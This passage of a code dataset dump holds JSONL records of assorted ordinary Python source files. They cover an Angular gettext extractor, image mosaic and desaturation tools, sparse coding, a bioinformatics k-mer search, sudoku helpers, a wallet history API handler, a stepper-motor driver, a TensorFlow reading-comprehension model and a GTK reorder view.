original.ref == reconstituted.ref\n assert original.alt == reconstituted.alt\n assert original.start == reconstituted.start\n assert original.end == reconstituted.end\n\n # Test json.\n serialized = original.to_json()\n reconstituted = Variant.from_json(serialized)\n assert original == reconstituted\n","sub_path":"test/test_variant.py","file_name":"test_variant.py","file_ext":"py","file_size_in_byte":4540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"424634829","text":"try:\n from html.parser import HTMLParser\nexcept ImportError:\n from HTMLParser import HTMLParser\n\nimport locale\nimport logging\nimport re\n\n\ndef interpolate(data):\n interpolation_regex = r\"\"\"{\\$([\\w\\.\"'\\]\\[\\(\\)]+)\\$}\"\"\"\n return re.sub(interpolation_regex, r'%(\\1)', data)\n\n\nclass AngularGettextHTMLParser(HTMLParser):\n \"\"\"Parse HTML to find translate directives.\n\n Note: This will not cope with nested tags (which I don't think make any\n sense)\n \"\"\"\n\n def __init__(self):\n try:\n super(self.__class__, self).__init__()\n except TypeError:\n HTMLParser.__init__(self)\n\n self.in_translate = False\n self.data = []\n self.strings = []\n self.line = 0\n self.plural = False\n self.plural_form = ''\n self.comments = []\n\n def find_matches(self, string):\n for match in self._find_matches(string):\n if type(match) == tuple and len(match) == 2:\n self._add_plural_string(match[0], match[1])\n elif type(match) == tuple and len(match) == 3:\n self._add_context_string(match[0], match[1])\n else:\n self._add_string(match)\n\n def _find_matches(self, string):\n matches = []\n if not string:\n return []\n match = re.findall(r'\\.gettext\\([\"\\'](.*?)[\"\\']\\)', string)\n if match:\n matches.extend(match)\n match = re.findall(r'\\.pgettext\\([\"\\'](.*?)[\"\\'], +[\"\\'](.*?)[\"\\']\\)', string)\n if match:\n matches.extend([match[0] + ('+context',)])\n match = re.findall(\n r'\\.ngettext\\([\"\\'](.*?)[\"\\'], +[\"\\'](.*?)[\"\\'],[^)]*\\)', string)\n if match:\n matches.extend(match)\n return matches\n\n def _add_string(self, singular, comments=''):\n messages = interpolate(singular)\n self._add_msg(u'gettext', messages, comments)\n\n def _add_plural_string(self, singular, plural_form, comments=''):\n messages = (\n interpolate(singular),\n interpolate(plural_form)\n )\n self._add_msg(u'ngettext', messages, comments)\n\n def _add_context_string(self, singular, context, comments=''):\n messages = (\n interpolate(singular),\n interpolate(context)\n )\n self._add_msg(u'pgettext', messages, comments)\n\n def _add_msg(self, func_name, messages, comments):\n line = self.getpos()[0]\n if not comments:\n comments = []\n self.strings.append(\n (line, func_name, messages, comments)\n )\n\n def handle_starttag(self, tag, attrs):\n for attr, val in attrs:\n self.find_matches(val)\n\n def handle_data(self, data):\n self.find_matches(data)\n\n\ndef extract_angular(fileobj, keywords, comment_tags, options):\n \"\"\"Extract messages from angular template (HTML) files\n\n :param fileobj: the file-like object the messages should be extracted\n from\n :param keywords: This is a standard parameter so it is accepted but ignored.\n\n :param comment_tags: This is a standard parameter so it is accepted but\n ignored.\n :param options: Another standard parameter that is accepted but ignored.\n :return: an iterator over ``(lineno, funcname, message, comments)``\n tuples\n :rtype: ``iterator``\n \"\"\"\n if keywords:\n logging.debug('Parameter keywords ignored.')\n\n if comment_tags:\n logging.debug('Parameter comment_tags ignored.')\n\n if options:\n logging.debug('Parameter options ignored.')\n\n parser = AngularGettextHTMLParser()\n\n for line in fileobj:\n if not isinstance(line, str):\n line = line.decode(locale.getpreferredencoding())\n parser.feed(line)\n\n for string in parser.strings:\n yield(string)\n","sub_path":"angular_gettext_babel/extract.py","file_name":"extract.py","file_ext":"py","file_size_in_byte":3848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"537547785","text":"import numpy as np\nimport math\n\ndef find_rectangle(n): \n max_side = int(math.sqrt(n))\n for h in range(2, max_side+1)[::-1]:\n w = n // h\n if (w * h) == n:\n return (w,h)\n return (n, 1)\n\n# should work for 1d and 2d images, assumes images are square but can be overriden\ndef make_mosaic(images, n=None, nx=None, ny=None, w=None, h=None):\n if n is None and nx is None and ny is None:\n nx, ny = find_rectangle(len(images))\n else:\n nx = n if nx is None else nx\n ny = n if ny is None else ny\n images = np.array(images)\n if images.ndim == 2:\n side = int(np.sqrt(len(images[0])))\n h = side if h is None else h\n w = side if w is None else w\n images = images.reshape(-1, h, w)\n else:\n h = images.shape[1]\n w = images.shape[2]\n nx = int(nx)\n ny = int(ny)\n h = int(h)\n w = int(w)\n image_gen = iter(images)\n # should replace this code with https://stackoverflow.com/a/42041135/940196\n if len(images.shape) > 3:\n mosaic = np.empty((h*ny, w*nx, images.shape[3]))\n else:\n mosaic = np.empty((h*ny, w*nx))\n for i in range(ny):\n ia = (i)*h\n ib = (i+1)*h\n for j in range(nx):\n ja = j*w\n jb = (j+1)*w\n mosaic[ia:ib, ja:jb] = next(image_gen)\n return mosaic","sub_path":"make_mosaic.py","file_name":"make_mosaic.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"428682826","text":"import os\n\nimport scipy\nimport spams\nimport numpy as np\n\nfrom utils.utils import *\n\nimport argparse\nimport logging\nimport logging.config\nlogging.basicConfig(level=logging.DEBUG,\n format='%(asctime)s - %(levelname)s - %(message)s',\n datefmt='%d-%b-%y %H:%M:%S')\nlogging.config.dictConfig({\n 'version': 1,\n 'disable_existing_loggers': True,\n})\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Creates sparse contextualized representation.')\n parser.add_argument('--in_files', nargs='+', required=True) # it is assumed that the first file is used to determine matrix D\n\n parser.add_argument('--K', type=int, default=2000)\n parser.add_argument('--lda', type=float, default=0.05)\n parser.add_argument('--predefined_dictionary_file', type=str, default=None)\n\n parser.add_argument('--normalize', dest='normalize', action='store_true')\n parser.add_argument('--not-normalize', dest='normalize', action='store_false')\n parser.set_defaults(normalize=True)\n\n args = parser.parse_args()\n\n logging.info(args)\n\n params = {'K': args.K, 'lambda1': args.lda, 'numThreads': 8, 'iter': 1000, 'batchsize': 400, 'posAlpha': True, 'verbose': False}\n lasso_params = {x:params[x] for x in ['L','lambda1','lambda2','mode','pos','ols','numThreads','length_path','verbose'] if x in params}\n lasso_params['pos'] = True\n dict_file = args.predefined_dictionary_file # when follows random:x pattern, the dictionary is randomly generated using seed x\n D = None\n\n for i, in_file in enumerate(args.in_files):\n print(in_file)\n assert os.path.exists(in_file)\n\n embeddings = np.load(in_file)\n if args.normalize:\n embeddings = row_normalize(embeddings)\n embeddings = embeddings.T\n if not np.isfortran(embeddings):\n embeddings = np.asfortranarray(embeddings)\n\n if dict_file is None:\n dict_file = '{}_norm{}_K{}_lda{}'.format(in_file, args.normalize, args.K, args.lda)\n\n if not os.path.exists('{}.npy'.format(dict_file)):\n logging.info(\"Dictionary learning for embeddings of shape: {}\".format(embeddings.shape))\n D = spams.trainDL(embeddings, **params)\n np.save(dict_file, D)\n logging.info(\"Dictionary learning completed...\")\n else:\n logging.info('Dictionary file already exists')\n continue\n elif D is None and dict_file.startswith('random:'):\n seed = int(dict_file.split(':')[1])\n dict_file = '{}_norm{}_K{}_lda{}_rnd{}'.format(in_file, args.normalize, args.K, args.lda, seed)\n np.random.seed(seed)\n D = col_normalize(embeddings @ np.random.randn(embeddings.shape[1], args.K)).astype(embeddings.dtype)\n dd = D.T @ D\n ddd = [dd[i,j] for i in range(dd.shape[0]) for j in range(dd.shape[1]) if i>j]\n logging.info((np.mean(ddd), np.std(ddd), np.min(ddd), np.max(ddd)))\n np.save(dict_file, D)\n logging.info('Random dictionary generated using {}.'.format(dict_file))\n\n alphas_file = '{}_{}_norm{}_K{}_lda{}'.format(dict_file, os.path.basename(in_file), args.normalize, args.K, args.lda)\n logging.info((dict_file, alphas_file))\n\n D = np.load('{}.npy'.format(dict_file))\n if not np.isfortran(D):\n D=np.asfortranarray(D)\n logging.info((D.dtype, embeddings.dtype, D.shape, embeddings.shape))\n\n alphas = spams.lasso(embeddings, D=D, **lasso_params)\n scipy.sparse.save_npz(alphas_file, alphas.T)\n logging.info((alphas_file, alphas.nnz, alphas.shape, alphas.nnz/alphas.shape[1]))\n","sub_path":"src/02_sparsify.py","file_name":"02_sparsify.py","file_ext":"py","file_size_in_byte":3712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"207276353","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jan 05 09:15:32 2018\n\n@author: Memphis\n\"\"\"\n\nwith open('rosalind_ba1e.txt') as input_data:\n text = input_data.readline().strip()\n k, L, t = map(int, input_data.readline().strip().split())\n \nkmers = {}\nfor i in range(len(text)-k+1):\n\tpattern = text[i:i+k]\n\tif pattern in kmers.keys():\n\t\tkmers[pattern] += 1\n\telse:\n\t\tkmers[pattern] = 1\n#print len(kmers)\n\"\"\"\ndelete all the kmers with less than t repeats in whole length\nwill decrease the search space in later search\n\nvery clever!\n\"\"\"\nkmers2 = kmers.copy()\nfor i in kmers2:\n if kmers2[i] < t:\n del kmers[i]\n#print len(kmers)\nres = []\nfor i in range(len(text) - L + 1):\n for pattern in kmers.keys():\n if text[i:i+L].count(pattern) >= t:\n if pattern not in res:\n res.append(pattern)\n\nprint(' '.join(res))","sub_path":"bioinformatics textbook track/BA1E.py","file_name":"BA1E.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"499638836","text":"\ndef extract_zones(board):\n \"\"\"Read the board and extract the number of elements\n in all the squares (3x3),\n rows and columns. Add them in an array sorted desc\n by how many elements they have\"\"\"\n zones = []\n # extract lines info\n for row in range(0, len(board)):\n zone = {}\n zone[\"type\"] = \"row\"\n zone[\"len\"] = len(board[row]) - board[row].count(0)\n zone[\"coord\"] = row\n insert_sorted(zone, zones)\n # extract columns info\n for col in range(0, 9):\n nr_elements = 0\n for row in range(0, 9):\n if board[row][col] != 0:\n nr_elements += 1\n zone = {}\n zone[\"type\"] = \"col\"\n zone[\"len\"] = nr_elements\n zone[\"coord\"] = col\n insert_sorted(zone, zones)\n # extract squares info\n for square in generate_square_coords():\n nr_elements = 0\n for row in range(square[\"row_begin\"], square[\"row_end\"] + 1):\n for col in range(square[\"col_begin\"], square[\"col_end\"] + 1):\n if board[row][col] != 0:\n nr_elements += 1\n zone = {}\n zone[\"type\"] = \"square\"\n zone[\"len\"] = nr_elements\n zone[\"coord\"] = tuple(square.values())\n insert_sorted(zone, zones)\n\n return zones\n\n\ndef insert_sorted(zone, zones):\n \"\"\"Take a dictionary describing a zone\n and inserted in the list of zones based\n on the len field\"\"\"\n if len(zones) == 0:\n zones.append(zone)\n else:\n inserted = False\n for i in range(0, len(zones)):\n if zone[\"len\"] > zones[i][\"len\"]:\n zones.insert(i, zone)\n inserted = True\n break\n else:\n continue\n if not inserted: # it was smaller than all of them\n zones.append(zone)\n\n\ndef insert_possibilities(puzzle, row, col):\n \"\"\"Eliminate possibilities for the position\n and insert if left with only one\"\"\"\n if puzzle[row][col] == 0:\n row_elements = get_zone_elements(\"row\", row, col, puzzle)\n col_elements = get_zone_elements(\"col\", row, col, puzzle)\n square_elements = get_zone_elements(\"square\", row, col, puzzle)\n numbers = [number for number in range(1, 10)]\n possibilities = [i for i in range(1, 10)]\n for possibility in numbers:\n if (possibility in row_elements) or (\n possibility in col_elements) or (\n possibility in square_elements):\n possibilities.remove(possibility)\n if len(possibilities) == 1:\n puzzle[row][col] = possibilities[0]\n\n\ndef get_zone_elements(zone_type, coord1, coord2, board):\n \"\"\"Get all non-zero elements from a col, row or square\n zone_type (str): col / row / square\n coord1, coord2 (int): coordinates of the element we're at\n coord1 = row\n coord2 = col\"\"\"\n elements = []\n if zone_type == \"col\":\n for row in range(0, 9):\n if board[row][coord2] != 0:\n elements.append(board[row][coord2])\n elif zone_type == \"row\":\n for col in range(0, 9):\n if board[coord1][col] != 0:\n elements.append(board[coord1][col])\n else:\n square_coords = generate_square_coords()\n for square in square_coords:\n if (square[\"row_begin\"] <= coord1 <= square[\"row_end\"]) and (\n square[\"col_begin\"] <= coord2 <= square[\"col_end\"]):\n for row in range(square[\"row_begin\"], square[\"row_end\"] + 1):\n for col in range(square[\"col_begin\"],\n square[\"col_end\"] + 1):\n if board[row][col] != 0:\n elements.append(board[row][col])\n break\n\n return elements\n\n\ndef generate_square_coords():\n \"\"\"Build a tuple of disctionaries with square coords\"\"\"\n square_coordinates = []\n row_begin = 0\n row_end = 2\n col_begin = 0\n col_end = 2\n\n while len(square_coordinates) < 9:\n square_coordinates.append({\n \"row_begin\": row_begin,\n \"row_end\": row_end,\n \"col_begin\": col_begin,\n \"col_end\": col_end\n })\n if col_begin < 6 and col_end < 8:\n col_begin += 3\n col_end += 3\n else:\n col_begin = 0\n col_end = 2\n row_begin += 3\n row_end += 3\n\n return tuple(square_coordinates)\n\n\ndef print_board(board):\n \"\"\"Take the board and print it in a readable way in the console\"\"\"\n print(\"-\\t\" * 13)\n for row in range(0, len(board)):\n formatted_str = \"|\" + \"\\t\"\n for col in range(0, len(board[row])):\n if col in [3, 6]:\n formatted_str += \"|\\t\"\n formatted_str += str(board[row][col]) + \"\\t\"\n formatted_str += \"|\"\n print(formatted_str)\n if row in [2, 5]:\n print(\"-\\t\" * 13)\n print(\"-\\t\" * 13)","sub_path":"others_solvers/various_non_recursive/nr1/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"477066511","text":"myUniqueList = []\r\nmyLeftOvers = []\r\n\r\ndef leftovers(a):\r\n\tmyLeftOvers.append(a)\r\n\r\n\t\r\ndef addtolist(a):\r\n\tif(a not in myUniqueList):\r\n\t\tmyUniqueList.append(a)\r\n\t\treturn True\r\n\telse:\r\n\t\tleftovers(a)\r\n\t\treturn False\r\n\r\np = addtolist(2)\r\nq = addtolist(3)\r\nr = addtolist(4)\r\ns = addtolist(2)\r\nt = addtolist(6)\r\nw = addtolist(6)\r\n\r\n\r\nprint(myUniqueList)\r\nprint(myLeftOvers)","sub_path":"list.py","file_name":"list.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"545086391","text":"\"\"\"\nGoal:\n - Takes in batches of (document, question, answer) tuples,\n runs bidirectional rnn, finds attention weights, and calculates loss\n\nArchitecture Overview:\n - Bidirectional LSTM/GRU on documents and questions (concatenate depth-wise)\n - Take last outputs of questions (from each direction) as query vector\n - Use bilinear weight to calculate similarity metric/attention weight for\n each word in the document using the query vector\n - Take weighted sum of word vectors and use that to make prediction\n\nIssues:\n - Better to pass mask itself instead of repeatedly creating masks with seq_lens?\n - Make softmax numerically stable\n - Gradient Clipping in GRU\n\nCredits: Attentive Reader model developed by https://arxiv.org/pdf/1506.03340.pdf\n and Stanford Reader model developed by https://arxiv.org/pdf/1606.02858v2.pdf\n\"\"\"\n\nimport tensorflow as tf\nimport numpy as np\nfrom rnn_cell import GRUCell\nfrom rnn import bidirectional_rnn, rnn\nfrom attention import BilinearFunction\n\nclass StanfordReader(object):\n \"\"\"\n Purpose:\n Instances of this class run the whole StanfordReader model.\n \"\"\"\n def __init__(self, max_entities, hidden_size=128, vocab_size=50000, embedding_dim=100, batch_size=32):\n self.max_entities = max_entities\n tf.set_random_seed(1234)\n\n # Placeholders\n # can add assert statements to ensure shared None dimensions are equal (batch_size)\n self.input_d = tf.placeholder(tf.int32, [None, None], name=\"input_d\")\n self.input_q = tf.placeholder(tf.int32, [None, None], name=\"input_q\")\n self.input_a = tf.placeholder(tf.int32, [None, ], name=\"input_a\")\n self.input_m = tf.placeholder(tf.int32, [None, ], name=\"input_m\")\n\n seq_lens_d = tf.reduce_sum(tf.cast(self.input_d >= 0, tf.int32), 1)\n seq_lens_q = tf.reduce_sum(tf.cast(self.input_q >= 0, tf.int32), 1)\n\n mask_d = tf.cast(tf.sequence_mask(seq_lens_d), tf.int32)\n mask_q = tf.cast(tf.sequence_mask(seq_lens_q), tf.int32)\n mask_m = tf.cast(tf.sequence_mask(self.input_m, maxlen=max_entities), dtype=tf.float32)\n\n # Document and Query embddings; One-hot-encoded answers\n masked_d = tf.mul(self.input_d, mask_d)\n masked_q = tf.mul(self.input_q, mask_q)\n one_hot_a = tf.one_hot(self.input_a, self.max_entities)\n\n # Buildling Graph (Network Layers)\n # ==================================================\n with tf.device('/cpu:0'), tf.variable_scope(\"embedding\"):\n W_embeddings = tf.get_variable(shape=[vocab_size, embedding_dim], \\\n initializer=tf.random_uniform_initializer(-0.01, 0.01),\\\n name=\"W_embeddings\")\n ################## Make option to use pre-trained embeddings ##################\n\n # Dimensions: batch x max_length x embedding_dim\n document_embedding = tf.gather(W_embeddings, masked_d)\n question_embedding = tf.gather(W_embeddings, masked_q)\n\n with tf.variable_scope(\"bidirection_rnn\"):\n\n mask_d = tf.cast(tf.sequence_mask(seq_lens_d), tf.float32)\n mask_q = tf.cast(tf.sequence_mask(seq_lens_q), tf.float32)\n\n # Bidirectional RNNs for Document and Question\n forward_cell_d = GRUCell(state_size=hidden_size, input_size=embedding_dim, scope=\"GRU-Forward-D\")\n backward_cell_d = GRUCell(state_size=hidden_size, input_size=embedding_dim, scope=\"GRU-Backward-D\")\n\n forward_cell_q = GRUCell(state_size=hidden_size, input_size=embedding_dim, scope=\"GRU-Forward-Q\")\n backward_cell_q = GRUCell(state_size=hidden_size, input_size=embedding_dim, scope=\"GRU-Backward-Q\")\n\n hidden_states_d, last_state_d = bidirectional_rnn(forward_cell_d, backward_cell_d, \\\n document_embedding, mask_d, concatenate=True)\n\n hidden_states_q, last_state_q = bidirectional_rnn(forward_cell_q, backward_cell_q, \\\n question_embedding, mask_q, concatenate=True)\n\n with tf.variable_scope(\"attention\"):\n # Attention Layer\n attention = BilinearFunction(attending_size=hidden_size*2, attended_size=hidden_size*2)\n self.alpha_weights, self.attend_result = attention(attending=last_state_q, attended=hidden_states_d, \\\n time_mask=mask_d)\n\n with tf.variable_scope(\"prediction\"):\n W_predict = tf.get_variable(name=\"predict_weight\", shape=[hidden_size*2, self.max_entities], \\\n initializer=tf.random_normal_initializer(mean=0.0, stddev=0.1))\n b_predict = tf.get_variable(name=\"predict_bias\", shape=[self.max_entities],\n initializer=tf.constant_initializer(0.0))\n # Dimensions (batch_size x max_entities)\n predict_probs = (tf.matmul(self.attend_result, W_predict) + b_predict) * mask_m\n\n # Custom Softmax b/c need to use time_mask --------------------\n # Also numerical stability:\n\n # e_x = exp(x - x.max(axis=1))\n # out = e_x / e_x.sum(axis=1)\n numerator = tf.exp(tf.sub(predict_probs, tf.expand_dims(tf.reduce_max(predict_probs, 1), -1))) * mask_m\n denom = tf.reduce_sum(numerator, 1)\n\n # Transpose so broadcasting scalar division works properly\n # Dimensions (batch x max_entities)\n predict_probs_normalized = tf.div(numerator, tf.expand_dims(denom, 1))\n likelihoods = tf.reduce_sum(tf.mul(predict_probs_normalized, one_hot_a), 1)\n log_likelihoods = tf.log(likelihoods+0.00000000000000000001)\n\n # Negative log-likelihood loss\n self.loss = tf.mul(tf.reduce_sum(log_likelihoods), -1)/tf.cast(tf.shape(self.input_d)[0], tf.float32)\n correct_vector = tf.cast(tf.equal(tf.argmax(one_hot_a, 1), tf.argmax(predict_probs_normalized, 1)), \\\n tf.float32, name=\"correct_vector\")\n self.accuracy = tf.reduce_mean(correct_vector)\n\n\n def get_mask_shape(self):\n print (self.mask_d.get_shape(), self.mask_q.get_shape())\n","sub_path":"reading_comprehension/StanfordReader1.py","file_name":"StanfordReader1.py","file_ext":"py","file_size_in_byte":6137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"52554064","text":"from PIL import Image\nimport sys, argparse\n\n# Show a progression bar:\ndef percentbar(percent, size=10):\n print(\"\\r[{0:<{size}}] {1:.0%}\".format('#'*int(percent*size), percent, size=size)),\n sys.stdout.flush()\n\n# Desaturate:\ndef desaturate(input, output, progress):\n \n #Read input:\n try:\n myimage = Image.open(input)\n pixels = myimage.load()\n except:\n print(\"Error loading image!\")\n \n #Get some metadata\n sizeX, sizeY = myimage.size\n mode = myimage.mode\n \n if mode == \"RGB\": \n for i in range(sizeX):\n for j in range(sizeY): \n \n #Weighted desaturation:\n value = int(pixels[i,j][0] * 0.3 + pixels[i,j][1] * 0.59 + pixels[i,j][2] * 0.11)\n pixels[i,j] = (value, value, value)\n \n #Show progress if demanded: \n if progress:\n percentbar(i / float(sizeX-1), 20)\n \n elif mode == \"RGBA\":\n for i in range(sizeX):\n for j in range(sizeY): \n \n #Weighted desaturation:\n value = int(pixels[i,j][0] * 0.3 + pixels[i,j][1] * 0.59 + pixels[i,j][2] * 0.11)\n pixels[i,j] = (value, value, value, pixels[i,j][3])\n \n #no desaturation needed for modes \"1\", \"L\"\n \n print(\"Saving...\")\n \n #Save to output:\n myimage.save(output)\n \n#Main: \nif __name__ == \"__main__\":\n \n#Get address from command line:\n\n parser = argparse.ArgumentParser(description='Desaturates a PNG.')\n parser.add_argument('--input','-i',help='specifies the input-file path')\n parser.add_argument('--output','-o',help='specifies the input-file path')\n parser.add_argument('--noprogress', '-np', help='don\\'t show a progressbar, might help with performance', action=\"store_true\")\n args = parser.parse_args()\n \n #Get input and output, parse it for desaturation:\n if args.input is not None and args.output is not None:\n if args.noprogress:\n desaturate(args.input, args.output, False)\n else:\n desaturate(args.input, args.output, True)\n elif args.input == \"None\":\n print(\"Please specify an input-file.\")\n else:\n print(\"Please specify an output-file.\")\n \n","sub_path":"pngdesaturate.py","file_name":"pngdesaturate.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"560945267","text":"set1 = {11,12,13}\nset2 = {87,56,78}\ncounter =0\nlength= len(set1)\n#print(length)\ni=j=0\n\nfor i in set1:\n for j in set2:\n if i==j:\n counter += 1\n #print(counter)\nif counter == length:\n print(\"True! Subset\")\nelse:\n print(\"False! Not Subset\")","sub_path":"submissions/sp_047_suneet/Week 12/Day 4/session_2/check_subset.py","file_name":"check_subset.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"333492399","text":"#!/usr/bin/env python3\nimport struct\nfrom sys import stdin, stdout\n\nfor l in stdin:\n\tif l[0] == '#':\n\t\tcontinue\n\n\tcoords = list(map(float, l.split()[1:4]))\n\tbinary = struct.pack('fff', *coords)\n\tstdout.buffer.write(binary)\n","sub_path":"pointclouds/colmap_to_bin.py","file_name":"colmap_to_bin.py","file_ext":"py","file_size_in_byte":223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"432619112","text":"# -*- coding: utf-8 -*-\n#\n# Project name: NynjaWalletPy\n# File name: history\n# Created: 2018-07-12\n#\n# Author: Liubov M. <liubov.mikhailova@gmail.com>\n\nimport logging\nfrom base import BaseHandler\nfrom helpers.http_helper import get_request\nfrom static_vars.global_string import MISSED_REQUIRED_PARAMS\nfrom static_vars.global_variables import GET_ACC_TRANSFER_HISTORY\n\nlogger = logging.getLogger(__name__)\n\n\nclass WalletHistoryHandler(BaseHandler):\n allowed_methods = ('GET', )\n\n def get(self):\n \"\"\"\n Get transfer history\n \"\"\"\n logger.info(\"WalletHistory/Get: {0}\".format(self.request.arguments))\n\n required_param_names = ['address']\n required_params = self.get_request_params(required_param_names, query_param=True)\n\n # check for missing params\n missed_param_names = self.missing_required_params(required_param_names, required_params)\n if missed_param_names:\n return self.failure(message=MISSED_REQUIRED_PARAMS.format(', '.join(missed_param_names)))\n\n get_history_response = get_request(GET_ACC_TRANSFER_HISTORY.format(required_params['address']))\n if get_history_response['message'] == \"NOTOK\":\n return self.failure(message=get_history_response['result'])\n\n history = []\n if get_history_response['result']:\n for r in get_history_response['result']:\n history.append({\n 'address_from': r['from'],\n 'address_to': r['to'],\n 'timestamp': r['timeStamp'],\n 'amount': r['value']\n })\n\n response = {\n 'history': history\n }\n\n return self.success(response)","sub_path":"api/handlers/history.py","file_name":"history.py","file_ext":"py","file_size_in_byte":1713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"4324597","text":"#!/usr/bin/env python\n\"\"\"\n28BYJ_48.py\n2020-11-22\nPublic Domain\n\nhttp://abyz.me.uk/lg/py_lgpio.html\n\n./28BYJ_48.py [chip] gpio1 gpio2 gpio3 gpio4\n\nE.g.\n\n./28BYJ_48.py 20 21 22 23 # gpiochip=0 gpio1=20 gpio2=21 gpio3=22 gpio4=23\n\n./28BYJ_48.py 2 7 5 11 3 # gpiochip=2 gpio1=7 gpio2=5 gpio3=11 gpio4=3\n\"\"\"\n\nclass stepper:\n \"\"\"\n A class to pulse a stepper.\n \"\"\"\n\n on = [7, 3, 11, 9, 13, 12, 14, 6]\n\n def __init__(self, sbc, chip, GPIO):\n \"\"\"\n \"\"\"\n self._sbc = sbc\n self._chip = chip\n self._leader = GPIO[0]\n self._pos = 0\n\n sbc.group_claim_output(chip, GPIO)\n\n def move(self):\n\n if self._pos < 0:\n self._pos = 7\n elif self._pos > 7:\n self._pos = 0\n\n self._sbc.group_write(self._chip, self._leader, stepper.on[self._pos])\n\n def forward(self):\n self._pos += 1\n self.move()\n\n def backward(self):\n self._pos -= 1\n self.move()\n\n def stop(self):\n self._sbc.group_free(self._chip, self._leader)\n\nif __name__ == \"__main__\":\n\n import time\n import sys\n import lgpio as sbc\n\n if len(sys.argv) == 6: # chip gpio1 gpio2 gpio3 gpio4\n chip = int(sys.argv[1])\n gpio1 = int(sys.argv[2])\n gpio2 = int(sys.argv[3])\n gpio3 = int(sys.argv[4])\n gpio4 = int(sys.argv[5])\n\n elif len(sys.argv) == 5: # gpio1 gpio2 gpio3 gpio4 (chip 0)\n chip = 0\n gpio1 = int(sys.argv[1])\n gpio2 = int(sys.argv[2])\n gpio3 = int(sys.argv[3])\n gpio4 = int(sys.argv[4])\n\n else:\n print(\"Usage: ./28BYJ_48.py [chip] gpio1 gpio2 gpio3 gpio4\")\n exit()\n\n chip = sbc.gpiochip_open(0)\n\n s = stepper(sbc, chip, [gpio1, gpio2, gpio3, gpio4])\n\n for i in range(4096):\n time.sleep(0.0015)\n s.forward()\n\n for i in range(4096):\n time.sleep(0.0015)\n s.backward()\n\n s.stop()\n\n sbc.gpiochip_close(chip)\n\n","sub_path":"EXAMPLES/py_lgpio/28BYJ_48.py","file_name":"28BYJ_48.py","file_ext":"py","file_size_in_byte":1851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"516595426","text":"import cairo\nfrom gettext import gettext as _\n\nfrom gi.repository import Gtk\nfrom gi.repository import Gdk\nfrom gi.repository import GObject\nfrom gi.repository import GdkPixbuf\n\nfrom sugar3.graphics import style\nfrom sugar3.graphics.toolbutton import ToolButton\n\nHANDLE_SIZE = 18\nMIN_IMAGE_SIZE = 50\n\n\nclass BaseWindow(Gtk.Window):\n\n def __init__(self, width=-1, height=-1):\n GObject.GObject.__init__(self)\n self.set_border_width(style.LINE_WIDTH)\n self.set_position(Gtk.WindowPosition.CENTER_ALWAYS)\n self.set_decorated(False)\n self.set_resizable(False)\n if width == -1:\n width = Gdk.Screen.width() - style.GRID_CELL_SIZE * 2\n if height == -1:\n height = Gdk.Screen.height() - style.GRID_CELL_SIZE * 2\n self.set_size_request(width, height)\n\n\nclass BasicToolbar(Gtk.Toolbar):\n\n def __init__(self, icon_name, title=''):\n GObject.GObject.__init__(self)\n\n icon = ToolButton(icon_name)\n self.insert(icon, -1)\n\n label = Gtk.Label()\n label.set_markup('<b>%s</b>' % title)\n label.set_alignment(0, 0.5)\n tool_item = Gtk.ToolItem()\n tool_item.set_expand(True)\n tool_item.add(label)\n tool_item.show_all()\n self.insert(tool_item, -1)\n\n self.separator = Gtk.SeparatorToolItem()\n self.separator.props.draw = False\n self.separator.set_expand(True)\n self.insert(self.separator, -1)\n\n self.stop = ToolButton(icon_name='dialog-cancel')\n self.stop.set_tooltip(_('Cancel'))\n self.insert(self.stop, -1)\n self.stop.show()\n\n self.confirm = ToolButton(icon_name='dialog-ok')\n self.confirm.set_tooltip(_('Done'))\n self.insert(self.confirm, -1)\n self.confirm.show()\n\n\nclass ReorderView(BaseWindow):\n\n def __init__(self, activity):\n BaseWindow.__init__(self)\n self.toolbar = BasicToolbar('thumbs-view')\n\n self.toolbar.stop.connect('clicked', self.__stop_clicked_cb)\n self.toolbar.confirm.connect('clicked', self.__ok_clicked_cb)\n\n self.scrollwin = ReorderObjects(activity)\n title = _('Drag the images to reorder')\n label = Gtk.Label('')\n label.set_markup('<span size=\"x-large\">%s</span>' % title)\n self.vbox = Gtk.VBox()\n self.vbox.pack_start(self.toolbar, False, False, 0)\n self.vbox.pack_start(label, False, False, style.DEFAULT_SPACING)\n self.vbox.pack_start(self.scrollwin, True, True, 0)\n self.add(self.vbox)\n self.scrollwin.show()\n self.modify_bg(Gtk.StateType.NORMAL,\n style.COLOR_WHITE.get_gdk_color())\n\n def __stop_clicked_cb(self, button):\n self.destroy()\n\n def __ok_clicked_cb(self, button):\n self.scrollwin.reorder_comicboxs()\n self.scrollwin.display_comicboxs()\n self.destroy()\n\n\nclass ReorderObjects(Gtk.ScrolledWindow):\n def __init__(self, activity):\n GObject.GObject.__init__(self)\n self.set_policy(Gtk.PolicyType.NEVER, Gtk.PolicyType.ALWAYS)\n self.activity = activity\n self.comicboxes = self.activity.page.boxs\n\n self.liststore = Gtk.ListStore(GdkPixbuf.Pixbuf)\n self.iconview = 